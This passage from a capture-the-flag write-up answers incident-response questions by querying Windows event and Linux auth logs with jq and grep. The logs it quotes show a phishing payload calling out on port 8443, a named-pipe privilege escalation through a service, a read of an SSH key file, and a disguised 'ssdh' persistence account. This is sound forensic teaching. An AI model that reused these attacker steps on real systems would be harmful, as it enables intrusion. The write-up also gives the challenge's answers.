[2024-09-16 11:45:38: 10014 3940 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-16 11:49:40: 10014 8780 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

74 seconds after Chrome downloads the zip archive, there’s a howtosavexmas.pdf.exe process, followed by other suspicious activity. All these processes (as well as every one on this host as discussed above) have ProcessID of 10014, which is the accepted answer.

Answer: 10014

Question 8

Did the attacker’s payload make an outbound network connection? Our ElfSOC analysts need your help identifying the destination TCP port of this connection.

Sysmon ID 3 is Network connection detected. I’ll filter to get these events for the process ID identified above:

event_source: "WindowsEvent" and event.EventID: 3 and event.ProcessID: 10014

There are some events before the time of interest, but then at 10:37:51 there’s this:

From the command line, some jq foo makes this pretty easy:

oxdf@hacky$ cat WindowsEvent.log | grep "Network connection detected" | cut -d' ' -f8- | jq -r '. | select(.EventID == 3 and .ProcessID == 10014 and .EventTime > "2024-09-15 10:36:26") | "[\(.EventTime)] \(.Image) \(.DestinationHostname):\(.DestinationPort)"' 
[2024-09-15 10:37:51] C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe 19.148.239.35.bc.googleusercontent.com:8443
[2024-09-16 11:28:02] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:02] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:02] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:03] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:45] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:47] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:48] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:49] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:28:50] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:30:20] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389
[2024-09-16 11:33:03] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe DC01:389

Answer: 8443

Question 9

The attacker escalated their privileges to the SYSTEM account by creating an inter-process communication (IPC) channel. Submit the alpha-numeric name for the IPC channel used by the attacker.

A pipe seems like a likely culprit here, but I’ll search for Pipe created Sysmon events (ID 17) and not find anything interesting or near the timeframe.

I’ll get all the logs from the suspect host:

oxdf@hacky$ cat WindowsEvent.log | cut -d' ' -f8- | jq -rc '. | select(.Hostname == "SleighRider.northpole.local")' > WindowsEvent-SleighRider.log

Searching for IPC doesn’t turn up anything, but “pipe” does:

oxdf@hacky$ cat WindowsEvent-SleighRider.log | grep -i PIPE
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9187343239835812000,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":1571,"ProcessID":628,"ThreadID":5852,"Channel":"System","Domain":"NORTHPOLE","AccountName":"elf_user02","UserID":"S-1-5-21-3699322559-1991583901-1175093138-1110","AccountType":"User","ServiceName":"ddpvccdbr","ImagePath":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","ServiceType":"user mode service","StartType":"demand start","EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSystemEvent","SourceModuleType":"im_msvistalog","ServiceFileName":"cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr","ServiceStartType":"demand start","ServiceAccount":"LocalSystem","MoreDetails":"A service was installed in the system."}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9223372036854776000,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":731,"ProcessID":10014,"ThreadID":6340,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2024-09-15T10:38:22-04:00","ProcessGuid":"{face0b26-e125-6606-0b00-000000000700}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\ddpvccdbr\\ImagePath","Details":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","User":"NT AUTHORITY\\SYSTEM","EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSysmon","SourceModuleType":"im_msvistalog","ProcessId":628,"MoreDetails":"Registry value set:"}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9223372036854776000,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":732,"ProcessID":10014,"ThreadID":6340,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","RuleName":"-","UtcTime":"2024-09-15T10:38:22-04:00","ProcessGuid":"{face0b26-428e-660c-f10f-000000000700}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.19041.3636 (WinBuild.160101.0800)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{face0b26-e125-6606-e703-000000000000}","LogonId":"0x3e7","TerminalSessionId":0,"IntegrityLevel":"System","Hashes":"MD5=CB6CD09F6A25744A8FA6E4B3E4D260C5,SHA256=265B69033CEA7A9F8214A34CD9B17912909AF46C7A47395DD7BB893A24507E59,IMPHASH=272245E2988E1E430500B852C4FB5E18","ParentProcessGuid":"{face0b26-e125-6606-0b00-000000000700}","ParentProcessId":628,"ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentUser":"NT AUTHORITY\\SYSTEM","EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSysmon","SourceModuleType":"im_msvistalog","ProcessId":6484,"MoreDetails":"Process Create:"}
{"EventTime":"2024-09-15 10:38:22","Hostname":"SleighRider.northpole.local","Keywords":-9214364837600035000,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4697,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"Task":12289,"OpcodeValue":0,"RecordNumber":736050,"ActivityID":"{89CD0D3E-81EF-0000-6C0E-CD89EF81DA01}","ProcessID":668,"ThreadID":716,"Channel":"Security","Category":"Security System Extension","Opcode":"Info","SubjectUserSid":"S-1-5-21-3699322559-1991583901-1175093138-1110","SubjectUserName":"elf_user02","SubjectDomainName":"NORTHPOLE","SubjectLogonId":"0x57d0f65","ServiceName":"ddpvccdbr","ServiceFileName":"cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr","ServiceType":"0x10","ServiceStartType":3,"ServiceAccount":"LocalSystem","ClientProcessStartKey":1970324836978667,"ClientProcessId":8096,"ParentProcessId":5680,"EventReceivedTime":"2024-09-15T10:38:22-04:00","SourceModuleName":"inSecurityEvent","SourceModuleType":"im_msvistalog","Subject_SecurityID":"S-1-5-21-3699322559-1991583901-1175093138-1110","Subject_AccountName":"elf_user02","Subject_AccountDomain":"NORTHPOLE","Subject_LogonID":"0x57D0F65","ServiceInformation_ServiceName":"ddpvccdbr","ServiceInformation_ServiceFileName":"cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr","ServiceInformation_ServiceType":"0x10","ServiceInformation_ServiceStartType":3,"ServiceInformation_ServiceAccount":"LocalSystem","MoreDetails":"A service was installed in the system."}
...[snip]...

The first four logs show suspicious activity with a named pipe. I’ll save them to a file and then look at the event IDs:

oxdf@hacky$ cat pipe_event.log | jq '.EventID'
7045
13
1
4697

The first is for a new system service was installed in the system:

oxdf@hacky$ cat pipe_event.log | head -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9187343239835812000,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 7045,
  "SourceName": "Service Control Manager",
  "ProviderGuid": "{555908D1-A6D7-4695-8E1E-26931D2012F4}",
  "Version": 0,
  "Task": 0,
  "OpcodeValue": 0,
  "RecordNumber": 1571,
  "ProcessID": 628,
  "ThreadID": 5852,
  "Channel": "System",
  "Domain": "NORTHPOLE",
  "AccountName": "elf_user02",
  "UserID": "S-1-5-21-3699322559-1991583901-1175093138-1110",
  "AccountType": "User",
  "ServiceName": "ddpvccdbr",
  "ImagePath": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "ServiceType": "user mode service",
  "StartType": "demand start",
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSystemEvent",
  "SourceModuleType": "im_msvistalog",
  "ServiceFileName": "cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr",
  "ServiceStartType": "demand start",
  "ServiceAccount": "LocalSystem",
  "MoreDetails": "A service was installed in the system."
}

The next is the registry write that come with that installation:

oxdf@hacky$ cat pipe_event.log | head -2 | tail -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9223372036854776000,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 13,
  "SourceName": "Microsoft-Windows-Sysmon",
  "ProviderGuid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
  "Version": 2,
  "Task": 13,
  "OpcodeValue": 0,
  "RecordNumber": 731,
  "ProcessID": 10014,
  "ThreadID": 6340,
  "Channel": "Microsoft-Windows-Sysmon/Operational",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Registry value set (rule: RegistryEvent)",
  "Opcode": "Info",
  "RuleName": "T1031,T1050",
  "UtcTime": "2024-09-15T10:38:22-04:00",
  "ProcessGuid": "{face0b26-e125-6606-0b00-000000000700}",
  "Image": "C:\\Windows\\system32\\services.exe",
  "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ddpvccdbr\\ImagePath",
  "Details": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "User": "NT AUTHORITY\\SYSTEM",
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSysmon",
  "SourceModuleType": "im_msvistalog",
  "ProcessId": 628,
  "MoreDetails": "Registry value set:"
}

Then there’s a cmd.exe running from services.exe running the service binary which writes to the named pipe:

oxdf@hacky$ cat pipe_event.log | head -3 | tail -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9223372036854776000,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 1,
  "SourceName": "Microsoft-Windows-Sysmon",
  "ProviderGuid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
  "Version": 5,
  "Task": 1,
  "OpcodeValue": 0,
  "RecordNumber": 732,
  "ProcessID": 10014,
  "ThreadID": 6340,
  "Channel": "Microsoft-Windows-Sysmon/Operational",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Process Create (rule: ProcessCreate)",
  "Opcode": "Info",
  "RuleName": "-",
  "UtcTime": "2024-09-15T10:38:22-04:00",
  "ProcessGuid": "{face0b26-428e-660c-f10f-000000000700}",
  "Image": "C:\\Windows\\System32\\cmd.exe",
  "FileVersion": "10.0.19041.3636 (WinBuild.160101.0800)",
  "Description": "Windows Command Processor",
  "Product": "Microsoft® Windows® Operating System",
  "Company": "Microsoft Corporation",
  "OriginalFileName": "Cmd.Exe",
  "CommandLine": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "CurrentDirectory": "C:\\Windows\\system32\\",
  "User": "NT AUTHORITY\\SYSTEM",
  "LogonGuid": "{face0b26-e125-6606-e703-000000000000}",
  "LogonId": "0x3e7",
  "TerminalSessionId": 0,
  "IntegrityLevel": "System",
  "Hashes": "MD5=CB6CD09F6A25744A8FA6E4B3E4D260C5,SHA256=265B69033CEA7A9F8214A34CD9B17912909AF46C7A47395DD7BB893A24507E59,IMPHASH=272245E2988E1E430500B852C4FB5E18",
  "ParentProcessGuid": "{face0b26-e125-6606-0b00-000000000700}",
  "ParentProcessId": 628,
  "ParentImage": "C:\\Windows\\System32\\services.exe",
  "ParentCommandLine": "C:\\Windows\\system32\\services.exe",
  "ParentUser": "NT AUTHORITY\\SYSTEM",
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSysmon",
  "SourceModuleType": "im_msvistalog",
  "ProcessId": 6484,
  "MoreDetails": "Process Create:"
}

The last is the Windows security log for a new service:

oxdf@hacky$ cat pipe_event.log | tail -1 | jq .
{
  "EventTime": "2024-09-15 10:38:22",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9214364837600035000,
  "EventType": "AUDIT_SUCCESS",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 4697,
  "SourceName": "Microsoft-Windows-Security-Auditing",
  "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "Version": 1,
  "Task": 12289,
  "OpcodeValue": 0,
  "RecordNumber": 736050,
  "ActivityID": "{89CD0D3E-81EF-0000-6C0E-CD89EF81DA01}",
  "ProcessID": 668,
  "ThreadID": 716,
  "Channel": "Security",
  "Category": "Security System Extension",
  "Opcode": "Info",
  "SubjectUserSid": "S-1-5-21-3699322559-1991583901-1175093138-1110",
  "SubjectUserName": "elf_user02",
  "SubjectDomainName": "NORTHPOLE",
  "SubjectLogonId": "0x57d0f65",
  "ServiceName": "ddpvccdbr",
  "ServiceFileName": "cmd.exe /c echo ddpvccdbr &gt; \\\\.\\pipe\\ddpvccdbr",
  "ServiceType": "0x10",
  "ServiceStartType": 3,
  "ServiceAccount": "LocalSystem",
  "ClientProcessStartKey": 1970324836978667,
  "ClientProcessId": 8096,
  "ParentProcessId": 5680,
  "EventReceivedTime": "2024-09-15T10:38:22-04:00",
  "SourceModuleName": "inSecurityEvent",
  "SourceModuleType": "im_msvistalog",
  "Subject_SecurityID": "S-1-5-21-3699322559-1991583901-1175093138-1110",
  "Subject_AccountName": "elf_user02",
  "Subject_AccountDomain": "NORTHPOLE",
  "Subject_LogonID": "0x57D0F65",
  "ServiceInformation_ServiceName": "ddpvccdbr",
  "ServiceInformation_ServiceFileName": "cmd.exe /c echo ddpvccdbr > \\\\.\\pipe\\ddpvccdbr",
  "ServiceInformation_ServiceType": "0x10",
  "ServiceInformation_ServiceStartType": 3,
  "ServiceInformation_ServiceAccount": "LocalSystem",
  "MoreDetails": "A service was installed in the system."
}

The service name / name of the pipe is the answer: ddpvccdbr.

I could have also noticed the process running just after the howtosavexmas.pdf.exe process:

[2024-09-15 10:37:50: 10014 8096 5680] "C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe" 
[2024-09-15 10:38:22: 10014 6484 628] cmd.exe /c echo ddpvccdbr &gt; \\.\pipe\ddpvccdbr
[2024-09-15 10:38:34: 10014 4336 8096] powershell.exe

It’s showing that write to the pipe.

Answer: ddpvccdbr

Question 10

The attacker’s process attempted to access a file. Submit the full and complete file path accessed by the attacker’s process.

howtosavexqmas.pdf.exe runs at 10:37:50 (before the privesc) as ProcessID 10014 / ProcessId 8096 , and then PowerShell as a child at 10:38:34:

oxdf@hacky$ cat WindowsEvent-SleighRider.log | jq -rc '. | select(.EventID == 1 and .Hostname == "SleighRider.northpole.local" and .EventTime > "2024-09-15 10:36:35") | "[\(.EventTime): \(.ProcessId) \(.ParentProcessId)] \(.CommandLine)"'
[2024-09-15 10:36:36: 5272 1496] "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument http://hollyhaven.snowflake/howtosavexmas.zip
[2024-09-15 10:37:02: 2972 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:13: 3572 772] "C:\Windows\SysWOW64\DllHost.exe" /Processid:{776DBC8D-7347-478C-8D71-791E12EF49D8}
[2024-09-15 10:37:20: 8848 8524] consent.exe 8524 558 000001B2CD232F70
[2024-09-15 10:37:50: 8096 5680] "C:\Users\elf_user02\Downloads\howtosavexmas\howtosavexmas.pdf.exe" 
[2024-09-15 10:38:22: 6484 628] cmd.exe /c echo ddpvccdbr &gt; \\.\pipe\ddpvccdbr
[2024-09-15 10:38:34: 4336 8096] powershell.exe
[2024-09-15 10:42:00: 9012 628] C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
[2024-09-15 10:42:00: 9840 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:42:00: 10220 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:42:37: 9848 1256] taskhostw.exe -RegisterDevice -ProtectionStateChanged -FreeNetworkOnly
[2024-09-15 10:42:37: 532 772] C:\Windows\System32\smartscreen.exe -Embedding
[2024-09-15 10:43:33: 9292 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:44:09: 8220 608] powershell.exe
[2024-09-15 10:44:15: 2932 8220] "C:\Windows\system32\ipconfig.exe"
[2024-09-15 10:44:33: 9240 1256] "gpupdate.exe" /target:computer
[2024-09-15 10:45:37: 5748 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 10:45:37: 1108 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:45:37: 7004 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:46:27: 4412 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
[2024-09-15 10:46:33: 8064 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
[2024-09-15 10:49:40: 8364 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:50:02: 836 1256] "gpupdate.exe" /target:user
[2024-09-15 10:50:02: 8240 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:00:21: 9896 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:04:24: 9284 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:8
[2024-09-16 11:15:21: 7752 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:27:22: 7936 628] C:\Windows\ZiyfDiiO.exe
[2024-09-16 11:27:22: 532 7936] powershell.exe
[2024-09-16 11:27:36: 2280 532] "C:\Windows\system32\whoami.exe"
[2024-09-16 11:28:16: 9844 628] C:\Windows\YdTRctss.exe
[2024-09-16 11:28:16: 928 7936] powershell.exe
[2024-09-16 11:30:21: 6304 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:43:32: 9752 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-16 11:45:21: 7668 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:45:38: 3940 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-16 11:49:40: 8780 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

The question is unclear about if the attacker was able to access th file. So I’ll start with event ID 4664, An attempt was made to access an object:

oxdf@hacky$ cat WindowsEvent.log | grep 'SleighRider' | cut -d' ' -f8- | jq '. | select(.EventID == 4663 and .ProcessID == 10014)'
{
  "EventTime": "2024-09-16 10:45:48",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9223372036854775808,
  "EventType": "AUDIT_SUCCESS",
  "SeverityValue": 4,
  "Severity": "INFO",
  "EventID": 4663,
  "SourceName": "Microsoft-Windows-Security-Auditing",
  "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "Version": 1,
  "Task": 12800,
  "OpcodeValue": 0,
  "RecordNumber": 123456,
  "ProcessID": 10014,
  "ThreadID": 6340,
  "Channel": "Security",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Object Access",
  "Opcode": "Info",
  "UtcTime": "2024-09-16T10:45:48-04:00",
  "ProcessGuid": "{face0b26-426e-660c-eb0f-000000000700}",
  "ProcessName": "C:\\Users\\elf_user02\\Downloads\\howtosavexmas\\howtosavexmas.pdf.exe",
  "ObjectServer": "Security",
  "ObjectType": "File",
  "ObjectName": "C:\\Users\\elf_user02\\Desktop\\kkringl315@10.12.25.24.pem",
  "HandleID": "0x3fc",
  "Accesses": "READ_CONTROL,SYNCHRONIZE,ReadData",
  "AccessMask": "0x120089",
  "EventReceivedTime": "2024-09-16T10:45:48-04:00",
  "SourceModuleName": "inSecurity",
  "SourceModuleType": "im_msvistalog"
}

I can find this with KQL as well:

Answer: C:\Users\elf_user02\Desktop\kkringl315@10.12.25.24.pem

Questions 11-15

Question 11

The attacker attempted to use a secure protocol to connect to a remote system. What is the hostname of the target server?

The file accessed in Question 10 is a key file, and if the filename is correct, it’s for 10.12.25.24. I’ll look at the Auth logs for that IP:

oxdf@hacky$ cat AuthLog.log | grep 10.12.25.24
<134>1 2024-09-15T06:55:21-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:21.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6005]:", "message": "Connection from 34.30.110.62 port 39720 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:23-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:23.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6006]:", "message": "Connection from 34.30.110.62 port 39721 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:25-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:25.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6007]:", "message": "Connection from 34.30.110.62 port 39722 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:27-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:27.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6008]:", "message": "Connection from 34.30.110.62 port 39723 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:29-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:29.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6009]:", "message": "Connection from 34.30.110.62 port 39724 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:31-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:31.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6010]:", "message": "Connection from 34.30.110.62 port 39725 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:33-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:33.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6011]:", "message": "Connection from 34.30.110.62 port 39726 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:35-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:35.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6012]:", "message": "Connection from 34.30.110.62 port 39727 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:37-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:37.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6013]:", "message": "Connection from 34.30.110.62 port 39728 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T10:50:21-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T13:50:21.450567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6110]:", "message": "Connection from 34.30.110.62 port 39732 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T10:51:33-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T13:51:33.245567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6115]:", "message": "Connection from 34.30.110.62 port 39733 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T10:55:21-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T13:55:21.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6125]:", "message": "Connection from 34.30.110.62 port 41606 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-16T11:03:06-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:03:06.315201-04:00", "hostname": "kringleSSleigH", "service": "sshd[6301]:", "message": "Connection from 34.30.110.62 port 58634 on 10.12.25.24 port 802 rdomain \"\""}
<134>1 2024-09-16T11:05:57-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:05:57.781687-04:00", "hostname": "kringleSSleigH", "service": "sshd[6425]:", "message": "Connection from 34.30.110.62 port 48202 on 10.12.25.24 port 802 rdomain \"\""}

The connections are coming from 34.30.110.62, the IP involved in the phish.

Answer: kringleSSleigH

Question 12

The attacker created an account to establish their persistence on the Linux host. What is the name of the new account created by the attacker?

grep is very useful here as well, as I can look for the term “new” and find two logs for a new group and a new user on kringleSSleigH after the connection:

oxdf@hacky$ cat AuthLog.log | grep new
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.094499-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "new group: name=ssdh, GID=1002"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.121497-04:00", "hostname": "kringleSSleigH", "service": "useradd[6207]:", "message": "new user: name=ssdh, UID=1002, GID=1002, home=/home/ssdh, shell=/bin/bash, from=/dev/pts/6"}

The user name is ssdh, meant to look like sshd.

Answer: ssdh

Question 13

The attacker wanted to maintain persistence on the Linux host they gained access to and executed multiple binaries to achieve their goal. What was the full CLI syntax of the binary the attacker executed after they created the new user account?

I’ll look for activity involving the ssdh user:

oxdf@hacky$ cat AuthLog.log | grep ssdh
<134>1 2024-09-16T10:59:45-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:45.985591-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/sbin/adduser ssdh"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.088219-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "group added to /etc/group: name=ssdh, GID=1002"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.092365-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "group added to /etc/gshadow: name=ssdh"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.094499-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "new group: name=ssdh, GID=1002"}
